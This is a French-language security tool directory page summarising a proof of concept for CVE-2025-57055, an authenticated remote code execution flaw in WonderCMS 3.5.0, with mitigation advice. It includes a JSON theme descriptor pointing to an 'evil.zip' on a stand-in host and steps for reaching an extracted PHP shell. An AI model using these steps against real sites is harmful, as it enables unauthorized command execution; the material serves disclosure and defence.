Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-57055 — Exploit RCE authentifié pour WonderCMS 3.5.0 via l'installation de thème malveillant. Inclut les mécanismes de vulnérabilité, le PoC et des conseils d'atténuation pour les tests de sécurité et l'éducation. | Kitploit
Outils/GitHubGitHub/thawphone/cve-2025-57055
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubthawphone/cve-2025-57055

CVE-2025-57055

Exploit RCE authentifié pour WonderCMS 3.5.0 via l'installation de thème malveillant. Inclut les mécanismes de vulnérabilité, le PoC et des conseils d'atténuation pour les tests de sécurité et l'éducation.

Voir le dépôt
il y a 0 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-57055 : Exécution de code à distance authentifiée dans WonderCMS 3.5.0

Mécanisme de la vulnérabilité

Une vulnérabilité d'exécution de code à distance (RCE) authentifiée existe dans WonderCMS v3.5.0.

Le problème provient de la façon dont l'application gère les installations de thèmes/modules distants via des descripteurs JSON. Lorsqu'un administrateur soumet un fichier JSON distant faisant référence à une archive ZIP, son contenu est extrait dans un répertoire accessible via le web (par exemple, /themes/). Si le ZIP contient un fichier PHP, ce fichier devient accessible sur le web et peut être exécuté.

Ce comportement introduit un risque de RCE en raison :

  • de l'absence de validation ou d'assainissement du contenu du ZIP ;
  • de l'absence de restriction sur les types de fichiers extraits depuis des sources distantes ;
  • de l'accessibilité web des répertoires de thèmes/plugins.

Remarque : L'authentification administrateur est requise, mais les installations par défaut exposent le mot de passe administrateur publiquement (sur la page d'accueil), utilisent une connexion par mot de passe uniquement et n'imposent pas de contrôles d'authentification forts.

Critères d'acceptation pour les descripteurs de modules/thèmes distants

WonderCMS acceptera et tentera d'installer des modules/thèmes distants si le descripteur JSON soumis correspond au format attendu . Un descripteur qui réussit la vérification de format (et pointe vers une archive ZIP) sera récupéré et son contenu sera extrait dans un répertoire accessible via le web (par exemple, ) sans autre validation des types de fichiers.

wcms-modules.json
/themes/<nom>/

Exemple de descripteur :

root@kitploit:~
{
  "themes": {
    "SSRF": {
      "name": "FAKE",
      "repo": "https://example.com/",
      "zip": "https://example.com/evil.zip",
      "summary": "test",
      "version": "1.0.0",
      "image": "https://example.com/fake.png"
    }
  }
}

Preuve de concept (PoC)

Avertissement : Ne pas exécuter sur des systèmes de production. Utiliser uniquement des environnements de test autorisés.

  1. Obtenez le mot de passe administrateur depuis la page d'accueil publiquement exposée d'une installation WonderCMS par défaut.

  2. Connectez-vous au panneau d'administration.

  3. Accédez à la section d'installation des thèmes.

  4. Fournissez l'URL d'un descripteur JSON malveillant (par exemple, hébergé sur un serveur contrôlé par l'attaquant).

  5. Lancez l'installation. Le serveur effectuera les actions suivantes :

  • Récupérer le descripteur.
  • Télécharger l'archive ZIP spécifiée.
  1. Installez le thème malveillant téléchargé.

  2. Accédez au shell PHP extrait (par exemple, http://cible.com/themes/<Nom_du_Thème>/shell.php) pour exécuter des commandes arbitraires.

(Remarque : Effectuez ces étapes uniquement dans un environnement de test contrôlé. L'exploitation de cette vulnérabilité sur des systèmes en production sans autorisation est illégale.)

Réponse du fournisseur

  • La vulnérabilité a été signalée aux mainteneurs de WonderCMS en juillet 2025.

  • Les mainteneurs ont reconnu le signalement mais ont noté que, selon eux, ce comportement est acceptable pour les administrateurs.

Conseils d'atténuation

Pour réduire l'exposition :

  • Restreindre les capacités d'installation à distance aux sources de confiance (par exemple, GitHub uniquement).
  • Valider et assainir le contenu du ZIP avant l'extraction.
  • Renforcer l'authentification :
    • Masquer le mot de passe administrateur après l'installation.
    • Imposer une connexion avec nom d'utilisateur/mot de passe.
    • Activer l'authentification multifacteur (si disponible).
  • Empêcher l'accès aux fichiers exécutables dans themes/ ou plugins/ via la configuration du serveur.

Références

  • WonderCMS GitHub
  • OWASP A05:2021 – Security Misconfiguration
  • CWE-434 – Unrestricted Upload of File with Dangerous Type

Avertissement

Ces informations sont fournies à des fins de recherche défensive en sécurité et à des fins éducatives. Obtenez toujours une autorisation appropriée avant de tester ou de divulguer des vulnérabilités.

Télécharger l’outil